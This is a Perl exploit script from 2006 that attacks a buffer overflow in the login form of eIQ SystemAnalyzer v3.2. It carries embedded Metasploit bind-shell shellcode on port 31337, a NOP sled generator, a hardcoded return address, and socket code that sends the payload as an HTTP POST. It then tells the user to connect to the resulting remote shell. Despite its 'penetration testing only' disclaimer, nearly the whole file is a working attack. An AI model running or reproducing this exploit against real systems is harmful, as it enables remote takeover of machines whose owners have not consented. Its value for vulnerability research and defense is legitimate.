#!/usr/bin/perl
#ooOOooOOooOOooOOooOOooOOooOOooOOooOOooOOooOOooOOooOOooOOooOOooOOooOOooOOooOOooOOooOOooOOooOOooOOooOOooOOooOOooOOooOOooOOooOOooOO
#
#  ************************************************** !!! WARNING !!! ***********************************************************
#  *                                            FOR SECURITY TESTiNG ONLY!                                                      *
#  ******************************************************************************************************************************
#  * By using this code you agree that I makes no warranties or representations, express or implied, about the                  *
#  * accuracy, timeliness or completeness of this, including without limitations the implied warranties of                      *
#  * merchantability and fitness for a particular purpose.                                                                      *
#  * I makes NO Warranty of non-infringement. This code may contain technical inaccuracies or typographical errors.             *
#  * This code can never be copyrighted or owned by any commercial company, under no circumstances what so ever.                *
#  * but can be use for as long the developer, are giving explicit approval of the usage, and the user understand               *
#  * and approve of all the parts written in this notice.                                                                       *
#  * This program may NOT be used by any Danish company, unless explicit written permission from the developer .                *
#  * Neither myself nor any of my Affiliates shall be liable for any direct, incidental, consequential, indirect                *
#  * or punitive damages arising out of access to, inability to access, or any use of the content of this code,                 *
#  * including without limitation any PC, other equipment or other property, even if I am Expressly advised of                  *
#  * the possibility of such damages. I DO NOT encourage criminal activities. If you use this code or commit                    *
#  * criminal acts with it, then you are solely responsible for your own actions and by use, downloading,transferring,          *
#  * and/or reading anything from this code you are considered to have accepted the terms and conditions and have read          *
#  * this disclaimer. Once again this code is for penetration testing purposes only.                                            *
#  ******************************************************************************************************************************
#
# Notes:
#   The more complex our security becomes, the more complex our enemy's 
#         efforts must be. The more we seek to shut him out, the better he must 
#         learn to become at breaking in. Each new level of security that we manage 
#         becomes no more than a stepping stone for him who would surpass us, for 
#         he bases his next assault upon our best defenses.
#
#  Tested on : 
#            - Windows 2000 Server SP4, latest patch level

use IO::Socket; 
use Getopt::Long; 
my $host_header; 
my $target = "127.0.0.1";
my $port = "8416";


# Random NOP sled generator, 
# The following code must be called like this: $buf .= &generate_random_nops(size);
sub generate_random_nops 
{
    my $nopsize = shift;
    my $nopsize = ($nopsize - 1);
    my @nops = ("\x97", "\x96", "\x95", "\x93", "\x92", "\x91", "\x96", "\x40", "\x41", "\x46", "\x4E", "\x37", "\x3F", "\x27", "\x2F");
    my $randnops = join '', 
    map $nops[rand @nops], 0..$nopsize;

    return $randnops;
}

# win32_bind -  EXITFUNC=seh LPORT=31337 Size=696 Encoder=Alpha2 http://metasploit.com
my $shellcode =
    "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x49\x49\x37\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x51\x5a\x6a\x48".
    "\x58\x30\x42\x31\x50\x41\x42\x6b\x42\x41\x58\x42\x32\x42\x41\x32\x41\x41\x30\x41\x41\x58\x38\x42\x42\x50\x75\x78\x69\x49\x6c\x70".
    "\x6a\x6a\x4b\x30\x4d\x4d\x38\x6c\x39\x69\x6f\x69\x6f\x39\x6f\x63\x50\x6e\x6b\x50\x6c\x76\x44\x36\x44\x4e\x6b\x37\x35\x75\x6c\x6c".
    "\x4b\x53\x4c\x35\x55\x30\x78\x73\x31\x4a\x4f\x6e\x6b\x30\x4f\x66\x78\x6c\x4b\x73\x6f\x61\x30\x47\x71\x38\x6b\x31\x59\x6e\x6b\x45".
    "\x64\x4c\x4b\x67\x71\x7a\x4e\x76\x51\x4b\x70\x4d\x49\x6e\x4c\x6c\x44\x6f\x30\x33\x44\x37\x77\x4b\x71\x6a\x6a\x34\x4d\x75\x51\x58".
    "\x42\x4a\x4b\x4b\x44\x47\x4b\x32\x74\x44\x64\x55\x78\x71\x65\x4d\x35\x4e\x6b\x71\x4f\x47\x54\x54\x41\x6a\x4b\x72\x46\x6c\x4b\x76".
    "\x6c\x42\x6b\x6c\x4b\x43\x6f\x77\x6c\x57\x71\x58\x6b\x36\x63\x56\x4c\x6e\x6b\x6c\x49\x62\x4c\x51\x34\x67\x6c\x63\x51\x68\x43\x37".
    "\x41\x4b\x6b\x45\x34\x4e\x6b\x73\x73\x66\x50\x6c\x4b\x67\x30\x34\x4c\x4c\x4b\x54\x30\x77\x6c\x4c\x6d\x4e\x6b\x33\x70\x76\x68\x71".
    "\x4e\x53\x58\x6e\x6e\x50\x4e\x34\x4e\x38\x6c\x30\x50\x69\x6f\x6b\x66\x43\x56\x56\x33\x50\x66\x41\x78\x37\x43\x65\x62\x30\x68\x34".
    "\x37\x54\x33\x37\x42\x61\x4f\x72\x74\x59\x6f\x7a\x70\x33\x58\x5a\x6b\x7a\x4d\x4b\x4c\x65\x6b\x30\x50\x4b\x4f\x4b\x66\x73\x6f\x4e".
    "\x69\x4a\x45\x53\x56\x4d\x51\x6a\x4d\x67\x78\x76\x62\x56\x35\x50\x6a\x65\x52\x4b\x4f\x4a\x70\x51\x78\x79\x49\x74\x49\x7a\x55\x6e".
    "\x4d\x36\x37\x6b\x4f\x38\x56\x62\x73\x62\x73\x51\x43\x70\x53\x41\x43\x70\x43\x41\x43\x30\x43\x76\x33\x79\x6f\x6e\x30\x42\x46\x71".
    "\x78\x71\x6a\x52\x49\x30\x66\x32\x73\x4c\x49\x4b\x51\x4d\x45\x41\x78\x6d\x74\x36\x7a\x74\x30\x6f\x37\x30\x57\x49\x6f\x6e\x36\x52".
    "\x4a\x42\x30\x63\x61\x36\x35\x6b\x4f\x6e\x30\x73\x58\x59\x34\x6e\x4d\x54\x6e\x58\x69\x31\x47\x69\x6f\x6a\x76\x61\x43\x42\x75\x69".
    "\x6f\x6e\x30\x51\x78\x39\x75\x71\x59\x4b\x36\x41\x59\x42\x77\x6b\x4f\x38\x56\x50\x50\x76\x34\x33\x64\x36\x35\x6b\x4f\x6e\x30\x6d".
    "\x43\x73\x58\x38\x67\x34\x39\x6f\x36\x34\x39\x53\x67\x39\x6f\x59\x46\x63\x65\x4b\x4f\x4e\x30\x30\x66\x62\x4a\x35\x34\x41\x76\x53".
    "\x58\x71\x73\x50\x6d\x4d\x59\x78\x65\x63\x5a\x72\x70\x46\x39\x41\x39\x6a\x6c\x6e\x69\x6b\x57\x32\x4a\x61\x54\x4d\x59\x39\x72\x54".
    "\x71\x59\x50\x68\x73\x6f\x5a\x79\x6e\x32\x62\x76\x4d\x59\x6e\x37\x32\x46\x4c\x6c\x53\x4c\x4d\x53\x4a\x75\x68\x6e\x4b\x6e\x4b\x4c".
    "\x6b\x50\x68\x53\x42\x4b\x4e\x4c\x73\x54\x56\x4b\x4f\x41\x65\x70\x44\x59\x6f\x6e\x36\x63\x6b\x43\x67\x72\x72\x41\x41\x72\x71\x50".
    "\x51\x62\x4a\x33\x31\x70\x51\x70\x51\x53\x65\x41\x41\x79\x6f\x38\x50\x70\x68\x4c\x6d\x4e\x39\x33\x35\x5a\x6e\x70\x53\x39\x6f\x6e".
    "\x36\x42\x4a\x39\x6f\x79\x6f\x45\x67\x6b\x4f\x6e\x30\x4e\x6b\x51\x47\x4b\x4c\x6c\x43\x7a\x64\x43\x54\x4b\x4f\x6b\x66\x46\x32\x6b".
    "\x4f\x5a\x70\x55\x38\x6c\x30\x4d\x5a\x57\x74\x73\x6f\x71\x43\x4b\x4f\x78\x56\x6b\x4f\x4e\x30\x48";


$data  = "userName=admin&password=";
$data .= &generate_random_nops(288);
$data .= "\x41\x41\xEB\x04"; #  JMP SHORT + 4 to get past the Return Address, and letting us get to the Shellcode
$data .= "\x23\x46\x0E\x78"; #  Return Address -> Using a (78 0E 46 23) CALL EBX in MSVCP60.DLL installed in the eIQ Systemanalyzer directory
$data .= &generate_random_nops(4);
$data .= "$shellcode";
$data .= &generate_random_nops(1000);

 $bytecount = length($data); # Used for counting the bytes used in the post

GetOptions( 
        "target=s"      => \$target, 
        "port=i"        => \$port, 
        "help|?"        => sub { 
                                print "\n" x 90; 
                                print "\t #################################################\n"; 
                                print "\t #   eIQ SystemAnalyzer v3.2 Buffer Overflow     #\n"; 
                                print "\t #  ************* !!! WARNING !!! ************   #\n"; 
                                print "\t #  ******************************************   #\n"; 
                                print "\t #      (c)2006 by Dennis Rand - CIRT.DK         #\n";
                                print "\t #################################################\n"; 
                                print "\n\t -target\t\t eg.: 127.0.0.1\n"; 
                                print "\t -port\t\t\t eg.: 8416\n\n"; 
                                print "\tUsage eg.: eIQ.pl -t 127.0.0.1 -p 8416\n"; 
                                exit; 
                                } 
); 

$error .= "Error: You must specify a target host\n" if ((!$target)); 
$error .= "Error: You must specify a port number\n" if ((!$port)); 



if ($error) 
{ 
   print "Try eIQ.pl -help or -?' for more information.\n$error\n" ; 
   exit; 
} 

$host_header = join ("", 
    "Accept:  */*\r\n",
    "Referer: http://$target:$port/default.htm\r\n",
    "Accept-Language: da\r\n",
    "Content-Type: application/x-www-form-urlencoded\r\n",
    "Accept-Encoding: gzip, deflate\r\n",
    "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50215)\r\n",
    "Host: $target:$port\r\n",
    "Content-Length: $bytecount\r\n",
    "Connection: Keep-Alive\r\n",
    "Cache-Control: no-cache\r\n",
    "Cookie: salastloggeduser=admin; saroleofuser=Administrator");

if ($target)
{ 
   print "\n\n"; 
   $host = $target; 
   attack(); 
}; 

sub attack 
{ 
   print "[*] Target system - eIQ SystemAnalyzer v3.2\n\n";
   print "[*] Target :\t\t\t $target\n"; 
   print "[*] Port :\t\t\t $port\n";
   print "[*] Shellcode Size :\t\t ".length($shellcode)." Bytes\n"; 
   print "[*] Total packet Size:\t\t ".length($data)." Bytes\n"; 
   print "[*] Connecting To Target\n"; 
   $| = 1; 
   my $connection = IO::Socket::INET->new(Proto =>"tcp", 
                                          PeerAddr =>$target, 
                                          PeerPort =>$port) || die "[*] Failed to connect to $target port $port\n";

   print $connection "POST /cgi-bin/saserial.cgi HTTP/1.1\r\n$host_header\r\n\r\n$data"; 
   close $connection; 
   print "[*] Now Connect to remote shell on $target port 31337\r\n\r\n";
   sleep (2);
   exit; 
};